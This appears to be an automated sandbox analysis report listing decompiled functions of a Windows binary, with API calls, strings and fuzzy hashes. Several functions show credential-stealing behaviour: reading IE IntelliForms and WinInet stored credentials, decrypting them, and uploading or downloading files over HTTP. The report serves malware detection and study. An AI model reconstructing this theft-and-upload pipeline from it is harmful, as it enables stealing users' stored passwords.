Opcode Fuzzy Hash: fade05a9c81fc25c65aafd1161fd9e18d1181cf89335b8bf6bb70fa1f0c95d79
Instruction Fuzzy Hash: 0A12E330D04288DFDF11DFA8D9506EEBBB1BF19304F1041AEE84577292DB785A89CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004274BC, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 169encryptionstringCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,?,00000000), ref: 004274E1
CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,00000000,?,00000000), ref: 00427502
lstrlenW.KERNEL32(?,?,00000000), ref: 00427511
CryptHashData.ADVAPI32(00000000,?,00000000,00000000,?,00000000), ref: 00427524
CryptGetHashParam.ADVAPI32(00000000,00000002,?,?,00000000,?,00000000), ref: 00427547
wsprintfW.USER32 ref: 00427583
lstrcatW.KERNEL32(00000000,?), ref: 00427591
wsprintfW.USER32 ref: 004275B1
lstrcatW.KERNEL32(00000000,?), ref: 004275BF
CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 004275C8
CryptReleaseContext.ADVAPI32(?,00000000,?,00000000), ref: 004275D3
lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 0042761A
CryptUnprotectData.CRYPT32(?,00000000,0042780E,00000000,00000000,00000001,?), ref: 0042763D
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00427676

Strings

Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 004275ED
%02X, xrefs: 0042757D, 004275AB

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Crypt$Hash$ContextDatalstrcatlstrlenwsprintf$AcquireCreateDestroyFreeLocalParamReleaseUnprotect
String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
API String ID: 1004607082-2450551051
Opcode ID: 7435fcef8de393bf512078a3071899614512a75898f861da95b456c5d5907945
Instruction ID: 6c4020e34e4fa0ac9ecaf2b38a45becad4a5011078b4e03901ace7c46b26e65d
Opcode Fuzzy Hash: 7435fcef8de393bf512078a3071899614512a75898f861da95b456c5d5907945
Instruction Fuzzy Hash: A45151B1E00218AFEB119FA5DC49BEF77BCEF04700F14402AF501F2251E6B89A148B6A

Uniqueness

Uniqueness Score: -1.00%

Function 0043AFE4, Relevance: 18.0, APIs: 8, Strings: 2, Instructions: 465COMMON

Download Yara Rule

Strings

/, xrefs: 0043B07D
UT, xrefs: 0043B2C0

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: /$UT
API String ID: 0-1626504983
Opcode ID: 64f94695340ebcc2211893b99bbe63e76bae7295911a962628820348341fd81c
Instruction ID: c13ce7d9e5b9a23b644a301f5da5f3e402965a8d308260b2eda876021deb8c9d
Opcode Fuzzy Hash: 64f94695340ebcc2211893b99bbe63e76bae7295911a962628820348341fd81c
Instruction Fuzzy Hash: 29029C716083819FD724DF69C4807ABB7E4EF98308F14182FEA9587352D738D958CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0042768F, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 97stringencryptionCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 004276B5
lstrlenW.KERNEL32(00000002), ref: 004276C6
CredEnumerateW.SECHOST(Microsoft_WinInet_*,00000000,00000000,?), ref: 004276EF
CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000001,?), ref: 00427735
LocalFree.KERNEL32(?), ref: 0042775F
CredFree.ADVAPI32(?), ref: 00427778

Strings

J, xrefs: 004276CF
Microsoft_WinInet_*, xrefs: 004276EA
abe2869f-9b47-4cd9-a358-c22904dba7f7, xrefs: 004276A3

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CredFreelstrlen$CryptDataEnumerateLocalUnprotect
String ID: J$Microsoft_WinInet_*$abe2869f-9b47-4cd9-a358-c22904dba7f7
API String ID: 186292201-3120203912
Opcode ID: 433d930991c83b779c03b269947f69be9c0cb5218fe1aa294bf8aed9db4d416b
Instruction ID: 2b42fb956f9f761b73570da73c938f6343b18248a21c016a9630a490b5ccc698
Opcode Fuzzy Hash: 433d930991c83b779c03b269947f69be9c0cb5218fe1aa294bf8aed9db4d416b
Instruction Fuzzy Hash: EB313C75E00618ABCB20DF95DC44DEFBBB8FB84700F50416AE911E3250E775AA05DF65

Uniqueness

Uniqueness Score: -1.00%

Function 0041D425, Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 406timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041C71F: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0041C90E,00000002,00000000,00000000,00000000,?,?,0041CA44,?,00000000,00000000), ref: 0041C752

_strcat.LIBCMT ref: 0041D596
_strcat.LIBCMT ref: 0041D611
SystemTimeToFileTime.KERNEL32(?,000007BC), ref: 0041D766
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0041D786

Strings

/../, xrefs: 0041D5E7
/..\, xrefs: 0041D5F8
\..\, xrefs: 0041D5C0
\../, xrefs: 0041D5D6

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileTime$_strcat$LocalPointerSystem
String ID: /../$/..\$\../$\..\
API String ID: 3418985325-3885502717
Opcode ID: 2add7adfea3b93822114a7693bd786ce6609a7c9cfe3b3b5584af50ffab39a79
Instruction ID: b4a8d998caba85887f9031b8d6e64a3b0b6c6537c250e177d9257cdce3a4075f
Opcode Fuzzy Hash: 2add7adfea3b93822114a7693bd786ce6609a7c9cfe3b3b5584af50ffab39a79
Instruction Fuzzy Hash: 2DE1C1B19087419BC315CF29C4816EBBBE1AF89314F14492FE4E9CB342D739E585CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C72C, Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 380memoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040C731
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,00000018,00000003,w,?,?), ref: 0040CA00
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00000018,00000003,w,?,?,?,?,?,?), ref: 0040CA07

Strings

|, xrefs: 0040C812
:, xrefs: 0040C773
w, xrefs: 0040C8BE
a6, xrefs: 0040CB16

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$FreeH_prologProcess
String ID: :$a6$|$w
API String ID: 3114893737-569939854
Opcode ID: 22fee421e7b29b54e13f0ad2ab78fa97cfff0131627021eaa608c2b727774e3e
Instruction ID: c61eaaf422fc43dfe4cdd33b205ebee561633001912627c83513c0dfdc1b01d6
Opcode Fuzzy Hash: 22fee421e7b29b54e13f0ad2ab78fa97cfff0131627021eaa608c2b727774e3e
Instruction Fuzzy Hash: 69F1B131C04258CADF25DBA9CD91BEDBBB4AF19304F1042AED449B7292DB741B89CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004340F3, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 352registryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004340F8
RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?,?,?,00000004), ref: 00434196
RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,?,?,00000004), ref: 004341E4
RegCloseKey.ADVAPI32(?,?,?,00000004), ref: 004341ED

Part of subcall function 00412716: _Deallocate.LIBCONCRT ref: 00412725

Strings

, xrefs: 00434333, 00434347, 00434475, 00434346, 0043434E, 0043447C

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseDeallocateH_prologOpenQueryValue
String ID:
API String ID: 2130659939-3019521637
Opcode ID: 75a6c2c219804e79519cd613b8d7c5c56188f90ad578d17d70622c9ba3e75580
Instruction ID: 9004a6773dee330a6c941a679022ec811ff194ee2c9c8fc071318f17a823d27f
Opcode Fuzzy Hash: 75a6c2c219804e79519cd613b8d7c5c56188f90ad578d17d70622c9ba3e75580
Instruction Fuzzy Hash: 6BD13670E002489FDB15CFA5C8407EEBBB8EF55304F10816FD456B7282D7782A49CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00432621, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,00000000,00000100,00000100,00000000,00000000,?), ref: 00432669
RegQueryValueExW.KERNEL32(00000100,?,00000000,00000000,00000000,?), ref: 00432688
RegQueryValueExW.KERNEL32(00000100,?,00000000,00000000,00000000,?), ref: 004326C3
RegCloseKey.ADVAPI32(00000100), ref: 004326E4

Part of subcall function 00443711: _free.LIBCMT ref: 00443724

Strings

Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 00432667

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: QueryValue$CloseOpen_free
String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
API String ID: 3744367872-680441574
Opcode ID: b0a64b7d4e3c5636d748516f9f01e1921734d5bf1e4eb395acfab1ad27400dd0
Instruction ID: b9db40a8cd5f85953eefbb9496675eeaea13b14319b76f6d8181e1759c43dfc8
Opcode Fuzzy Hash: b0a64b7d4e3c5636d748516f9f01e1921734d5bf1e4eb395acfab1ad27400dd0
Instruction Fuzzy Hash: CB319375600209BBEF208F54DE85BAF7768EF08B54F208026FC04E6250D3B4DD159B69

Uniqueness

Uniqueness Score: -1.00%

Function 00433F35, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00433F3A
GetTimeZoneInformation.KERNEL32(?,75D724D0,00000000), ref: 00433F57

Part of subcall function 00412434: __EH_prolog.LIBCMT ref: 00412439

Part of subcall function 00412BD8: __EH_prolog.LIBCMT ref: 00412BDD
Part of subcall function 00412BD8: std::locale::_Init.LIBCPMT ref: 00412BFB

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0043409C

Strings

%~C, xrefs: 00433FBB
h~G, xrefs: 0043408A, 00434082

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$InformationInitIos_base_dtorTimeZonestd::ios_base::_std::locale::_
String ID: %~C$h~G
API String ID: 3259846166-503490007
Opcode ID: 8555a8ac60fc3bf7ed9b8e8bcd6ce63bf50719989231064fad5c7eac1b877a65
Instruction ID: 44efe761de8f5727f8901be87fd806294d9495ceb9a374320a1d7093b80869c9
Opcode Fuzzy Hash: 8555a8ac60fc3bf7ed9b8e8bcd6ce63bf50719989231064fad5c7eac1b877a65
Instruction Fuzzy Hash: A941BE71D00258CBDB11DFA9C9857EEBBB5AF48304F1081AED809B7241DB781A89CF56

Uniqueness

Uniqueness Score: -1.00%

Function 00427783, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0046AAC0,00000000,00000015,0046AAE0,?), ref: 004277A3
StrStrIW.SHLWAPI(?,0047B724), ref: 004277F4
CoTaskMemFree.OLE32(?), ref: 00427812
CoTaskMemFree.OLE32(?), ref: 00427820

Strings

(, xrefs: 004277D8

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeTask$CreateInstance
String ID: (
API String ID: 2903366249-3887548279
Opcode ID: cc49a6180a705776b15c625ddcc440452517344e0c33e7df62ee282663e5684a
Instruction ID: 9a3d53ea697328f269bc7eef4e3a3bc3c8a6a7ce7a37d834a3b8d95344631cb7
Opcode Fuzzy Hash: cc49a6180a705776b15c625ddcc440452517344e0c33e7df62ee282663e5684a
Instruction Fuzzy Hash: A3212874B04218EFDB04DFA5E888D9EBBB9FF88705B10806EE506A7250DB749D40CF15

Uniqueness

Uniqueness Score: -1.00%

Function 0040C332, Relevance: 7.8, APIs: 5, Instructions: 285memoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040C337
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 0040C44A
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 0040C451
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 0040C602
HeapFree.KERNEL32(00000000), ref: 0040C609

Part of subcall function 0040B6C3: __EH_prolog.LIBCMT ref: 0040B6C8

Part of subcall function 004124F9: _Deallocate.LIBCONCRT ref: 0041250E

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$FreeH_prologProcess$Deallocate
String ID:
API String ID: 4229974167-0
Opcode ID: 354895e728abbc6d4e33e3c96647cac5f71f848af37999aa69021dfc44b10fd8
Instruction ID: bb63d3dcf08fc660d0216b9b32304d48624ddedbe90e01d33fc8fcac6eb7241d
Opcode Fuzzy Hash: 354895e728abbc6d4e33e3c96647cac5f71f848af37999aa69021dfc44b10fd8
Instruction Fuzzy Hash: D4C13970D00248DBCF14DBE5C990AEEBBB5AF58304F50816EE405B7292DB786E48DF69

Uniqueness

Uniqueness Score: -1.00%

Function 0043BDC7, Relevance: 7.6, APIs: 5, Instructions: 52COMMON

Download Yara Rule

APIs

FindClose.KERNEL32(000000FF,?,0043BDF6,?,?,?,?,0040B23D,?,?), ref: 0043BDD3
FindFirstFileExW.KERNEL32(000000FF,00000001,?,00000000,00000000,00000000,?,?,?,?,?,0043BDF6,?,?), ref: 0043BE03
GetLastError.KERNEL32(?,?,0043BDF6,?,?,?,?,0040B23D,?,?), ref: 0043BE10
FindFirstFileExW.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,?,?,0043BDF6,?,?,?,?,0040B23D,?,?), ref: 0043BE2A
GetLastError.KERNEL32(?,?,0043BDF6,?,?,?,?,0040B23D,?,?), ref: 0043BE37

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$ErrorFileFirstLast$Close
String ID:
API String ID: 569926201-0
Opcode ID: a7306a7beaafb262f5ae8dd27baf30d550ea4ed60de739a14bd1731f07ed7cba
Instruction ID: 883d7f4cb93b60f484e437bf688d0bc5bac683a3b1c79f56b8453b7f3435ae87
Opcode Fuzzy Hash: a7306a7beaafb262f5ae8dd27baf30d550ea4ed60de739a14bd1731f07ed7cba
Instruction Fuzzy Hash: 1D01B531100184BBCF201F66DC0DD9F3FB9EFC9721F10052AF768911A0D7358461DAAA

Uniqueness

Uniqueness Score: -1.00%

Function 004317EF, Relevance: 4.6, APIs: 3, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,0043205B,00000001,?,?,?,00432194), ref: 00431830
GetProcAddress.KERNEL32(00000000,?), ref: 0043186D
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,0043205B,00000001,?,?,?,00432194), ref: 004318A1

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID:
API String ID: 145871493-0
Opcode ID: 2cd04921f33b7d206f11faf34f9df265d6dadd2607bda038123b524c9ebb92fc
Instruction ID: 98eb70f8a974a0faeb1800b34f80507d29faa50a5bb37aa78b9ed3d700646f07
Opcode Fuzzy Hash: 2cd04921f33b7d206f11faf34f9df265d6dadd2607bda038123b524c9ebb92fc
Instruction Fuzzy Hash: FB21F934D042999FDB05DFA8D8508EFBBB9EE49344F14117ED441B3211EB748A05C769

Uniqueness

Uniqueness Score: -1.00%

Function 004448BD, Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,004448BC,00000000,00000000,?,00000000,?,0044EC7C), ref: 004448DF
TerminateProcess.KERNEL32(00000000,?,004448BC,00000000,00000000,?,00000000,?,0044EC7C), ref: 004448E6
ExitProcess.KERNEL32 ref: 004448F8

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 61cc85caeaa79d5b3bd7c618bd33f18131517add86f9c694e73aba4014625ffd
Instruction ID: 013f72a5864b731e2c94ba5c0899137fcd5e00488653c6a2a36e8cb215057b25
Opcode Fuzzy Hash: 61cc85caeaa79d5b3bd7c618bd33f18131517add86f9c694e73aba4014625ffd
Instruction Fuzzy Hash: A7E04635400548ABDB123F54EC18A193B28FB90342B10042AF80596232DB7ADD51DE4A

Uniqueness

Uniqueness Score: -1.00%

Function 00430775, Relevance: 68.8, APIs: 34, Strings: 5, Instructions: 548filestringmemoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0043077A

Part of subcall function 00412716: _Deallocate.LIBCONCRT ref: 00412725

DeleteFileA.KERNEL32(00000000,00000000,00000000,00000048), ref: 004309C5
CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00430A44
WriteFile.KERNEL32(00000000,?,00000010,?,00000000), ref: 00430A57
CloseHandle.KERNEL32(00000000), ref: 00430A5E
CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00430A72
GetFileSize.KERNEL32(00000000,00000000), ref: 00430A81
GetProcessHeap.KERNEL32(00000000,00000800), ref: 00430A92
HeapAlloc.KERNEL32(00000000), ref: 00430A99
lstrlenA.KERNEL32 ref: 00430AB0
lstrcpynA.KERNEL32(00000000,00000001), ref: 00430AC5
lstrlenA.KERNEL32(?), ref: 00430AD2
lstrcpynA.KERNEL32(?,?,00000001), ref: 00430AE1
ReadFile.KERNEL32(?,?,00000001,?,00000000), ref: 00430AF8
lstrlenA.KERNEL32(?), ref: 00430B0B
lstrcpynA.KERNEL32(?,?,00000001), ref: 00430B1B
WinHttpSetOption.WINHTTP(00000000,00000000,00000000,00000000,00000000), ref: 00430B2C
WinHttpSetOption.WINHTTP(00000000,00000006,?,00000004), ref: 00430B4D
WinHttpSetOption.WINHTTP(00000000,00000005,000F4240,00000004), ref: 00430B58
WinHttpConnect.WINHTTP(00000000,00000000,000001BB,00000000,?), ref: 00430BF7
WinHttpConnect.WINHTTP(00000000,00000000,00000050,00000000,?), ref: 00430C58
WinHttpOpenRequest.WINHTTP(00000000,POST,00000000,00000000,00000000,00000000,00800100,?), ref: 00430CDE
WinHttpOpenRequest.WINHTTP(00000000,POST,00000000,00000000,00000000,00000000,00000100,?), ref: 00430D43
WinHttpSendRequest.WINHTTP(00000000,00000000,000000FF,00000008,?,?,00000000,?), ref: 00430DAD
WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 00430DD5

Part of subcall function 00435985: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,?,00000000,00000000,?,?,?,?,0043147E,?,00000080,00000000,?,0000000F), ref: 004359AA
Part of subcall function 00435985: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,?,?,?,00000000,00000000,?,?,?,?,0043147E,?,00000080,00000000), ref: 004359DF

WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 00430DEB
WinHttpReadData.WINHTTP(00000000,00000000,?,?), ref: 00430E29
WinHttpCloseHandle.WINHTTP(00000000), ref: 00430EC0
WinHttpCloseHandle.WINHTTP(00000000), ref: 00430ECA
CloseHandle.KERNEL32(?), ref: 00430ED3
DeleteFileA.KERNEL32(?), ref: 00430EDC
WinHttpCloseHandle.WINHTTP(00000000), ref: 00430EE3
GetProcessHeap.KERNEL32(00000000,00000010), ref: 00430EED
HeapFree.KERNEL32(00000000), ref: 00430EF4

Strings

%[^:]://%[^/]%[^], xrefs: 00430B6F
POST, xrefs: 00430CD8, 00430D3D
"; filename=", xrefs: 004308C6
`+"p, xrefs: 00430EC0, 00430ECA, 00430EE3
https, xrefs: 00430B82

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Http$File$CloseHandle$Heap$OptionRequestlstrcpynlstrlen$ByteCharConnectCreateDataDeleteMultiOpenProcessReadWide$AllocAvailableDeallocateFreeH_prologQueryReceiveResponseSendSizeWrite
String ID: "; filename="$%[^:]://%[^/]%[^]$POST$`+"p$https
API String ID: 35113230-1066634714
Opcode ID: 3697877b627a51a9a2c705b5b96699754d68f7b2f7b1bcb23bcf2eddcf80eb5a
Instruction ID: 532619799ebd1322bb54b974b79c82fd4f1a43c2918e45313c14ee692815e17f
Opcode Fuzzy Hash: 3697877b627a51a9a2c705b5b96699754d68f7b2f7b1bcb23bcf2eddcf80eb5a
Instruction Fuzzy Hash: 4332AD70D002589FDB15DFA4CD95AEEBBB4BF59304F0042AAE409B7211EB745E88CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00431311, Relevance: 35.3, APIs: 17, Strings: 3, Instructions: 268fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00431316
WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,?,0000000F,00000000), ref: 0043134E
CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,?,0000000F,00000000), ref: 00431372
WinHttpConnect.WINHTTP(?,00000000,000001BB,00000000,?,00000080,00000000,?,0000000F,00000000), ref: 0043143D

Part of subcall function 00435985: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,?,00000000,00000000,?,?,?,?,0043147E,?,00000080,00000000,?,0000000F), ref: 004359AA
Part of subcall function 00435985: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,?,?,?,00000000,00000000,?,?,?,?,0043147E,?,00000080,00000000), ref: 004359DF

WinHttpConnect.WINHTTP(?,00000000,00000050,00000000,?,00000080,00000000,?,0000000F,00000000), ref: 0043148C
WinHttpOpenRequest.WINHTTP(00000000,GET,00000000,00000000,00000000,00000000,00800100,?,?,0000000F,00000000), ref: 004314FE
WinHttpOpenRequest.WINHTTP(00000000,GET,00000000,00000000,00000000,00000000,00000100,?,?,0000000F,00000000), ref: 0043155F
WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000F,00000000), ref: 0043158F
WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,0000000F,00000000), ref: 0043159B
WinHttpQueryDataAvailable.WINHTTP(00000000,?,?,0000000F,00000000), ref: 004315AD
WinHttpReadData.WINHTTP(00000000,00000000,?,?,?,?,?,?,?,?,0000000F,00000000), ref: 004315DD
WriteFile.KERNEL32(?,00000000,00000000,DEDEC255,00000000,?,?,?,?,?,?,?,?,?,0000000F,00000000), ref: 004315F4
GetLastError.KERNEL32(?,0000000F,00000000), ref: 00431611
WinHttpCloseHandle.WINHTTP(00000000,?,0000000F,00000000), ref: 00431618
WinHttpCloseHandle.WINHTTP(00000000,?,0000000F,00000000), ref: 00431622
CloseHandle.KERNEL32(?,00000080,00000000,?,0000000F,00000000), ref: 0043162B
WinHttpCloseHandle.WINHTTP(?,?,0000000F,00000000), ref: 00431632

Strings

%99[^:]://%99[^/]%99[^], xrefs: 00431398
GET, xrefs: 004314F8, 00431559
`+"p, xrefs: 00431618, 00431622, 00431632

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Http$CloseHandle$OpenRequest$ByteCharConnectDataFileMultiWide$AvailableCreateErrorH_prologLastQueryReadReceiveResponseSendWrite
String ID: %99[^:]://%99[^/]%99[^]$GET$`+"p
API String ID: 4006077129-3783587993
Opcode ID: 33a1a1bc6ceed9352d29dc58c1c5b576b4994e9aa01dc25c2ef4740e629bdbd5
Instruction ID: 3584de1ac12565010843a93cbfe98bd6a7475f5acd51e544ac477c6f08027401
Opcode Fuzzy Hash: 33a1a1bc6ceed9352d29dc58c1c5b576b4994e9aa01dc25c2ef4740e629bdbd5
Instruction Fuzzy Hash: 7BA19071800219AFEB10DFA0CD85BEEB7B8FF09304F10406AE415A7251EB785E59CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 00430F2B, Relevance: 33.6, APIs: 16, Strings: 3, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00430F30
WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,?,0047734B,00000000), ref: 00430F79
WinHttpConnect.WINHTTP(00000000,00000000,000001BB,00000000,?,?,?,?,0047734B,00000000), ref: 00431048

Part of subcall function 00435985: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,?,00000000,00000000,?,?,?,?,0043147E,?,00000080,00000000,?,0000000F), ref: 004359AA
Part of subcall function 00435985: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,?,?,?,00000000,00000000,?,?,?,?,0043147E,?,00000080,00000000), ref: 004359DF

WinHttpConnect.WINHTTP(00000000,00000000,00000050,00000000,?,?,?,?,0047734B,00000000), ref: 0043109C
WinHttpOpenRequest.WINHTTP(00000000,?,00000000,00000000,00000000,00000000,00800100,?,?,?,?,0047734B,00000000), ref: 0043111F
WinHttpOpenRequest.WINHTTP(00000000,?,00000000,00000000,00000000,00000000,00000100,?,?,?,?,0047734B,00000000), ref: 00431191
_strlen.LIBCMT ref: 004311BF
_strlen.LIBCMT ref: 004311C9
WinHttpSendRequest.WINHTTP(00000000,Content-Type: text/plain; charset=UTF-8,000000FF,?,00000000,00000000,00000000,?,?,?,0047734B,00000000), ref: 004311E0
WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,?,?,0047734B,00000000), ref: 004311F2
WinHttpQueryDataAvailable.WINHTTP(00000000,?,?,?,?,0047734B,00000000), ref: 0043120A
WinHttpReadData.WINHTTP(00000000,00000000,?,?,?,?,?,?,?,?,0047734B,00000000), ref: 0043123F
WinHttpCloseHandle.WINHTTP(00000000,?,?,?,0047734B,00000000), ref: 004312E9
WinHttpCloseHandle.WINHTTP(00000000,?,?,?,0047734B,00000000), ref: 004312F3
WinHttpCloseHandle.WINHTTP(00000000,?,?,?,0047734B,00000000), ref: 004312FA

Strings

%99[^:]://%99[^/]%99[^], xrefs: 00430FA1
Content-Type: text/plain; charset=UTF-8, xrefs: 004311DA
`+"p, xrefs: 004312E9, 004312F3, 004312FA

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Http$CloseHandleOpenRequest$ByteCharConnectDataMultiWide_strlen$AvailableH_prologQueryReadReceiveResponseSend
String ID: %99[^:]://%99[^/]%99[^]$Content-Type: text/plain; charset=UTF-8$`+"p
API String ID: 3111926358-3348961201
Opcode ID: 3d79dad99ca5679446aaa4b71f4e5017215725a7cf8f53207d258d6af67b0846
Instruction ID: 09a83500bde3de186e6fe84114ad8361103a2d65de09aa0466d19edefe03aee9
Opcode Fuzzy Hash: 3d79dad99ca5679446aaa4b71f4e5017215725a7cf8f53207d258d6af67b0846
Instruction Fuzzy Hash: 1BC1AF709002189FDB19DFA4CD85AEFB7B4FF09304F1041AEE415A7251EB789A89CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00432040, Relevance: 28.6, APIs: 3, Strings: 16, Instructions: 102stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004317EF: LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,0043205B,00000001,?,?,?,00432194), ref: 00431830
Part of subcall function 004317EF: GetProcAddress.KERNEL32(00000000,?), ref: 0043186D
Part of subcall function 004317EF: FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,0043205B,00000001,?,?,?,00432194), ref: 004318A1

Part of subcall function 00431C4D: RegOpenKeyExW.KERNEL32(80000001,00432194,00000000,00020019,00432194,?,?,0043206A,00000001,?,?,?,00432194), ref: 00431C72
Part of subcall function 00431C4D: RegEnumKeyExW.ADVAPI32(00432194,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,0043206A,00000001), ref: 00431D03
Part of subcall function 00431C4D: RegCloseKey.ADVAPI32(00432194,?,?,0043206A,00000001,?,?,?,00432194), ref: 00431D10

Part of subcall function 00431D1A: RegOpenKeyExW.KERNEL32(80000001,00432194,00000000,00020019,00432194,?,?,?,0043207E,Identities,00000001,?,?,?,00432194), ref: 00431D41
Part of subcall function 00431D1A: RegEnumKeyExW.ADVAPI32(00432194,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0043207E,Identities,00000001), ref: 00431D6C
Part of subcall function 00431D1A: lstrlenW.KERNEL32(00432194,00000000,?,?,?,0043207E,Identities,00000001,?,?,?,00432194), ref: 00431D83
Part of subcall function 00431D1A: lstrlenW.KERNEL32(?,00000000,?,?,?,0043207E,Identities,00000001,?,?,?,00432194), ref: 00431D90
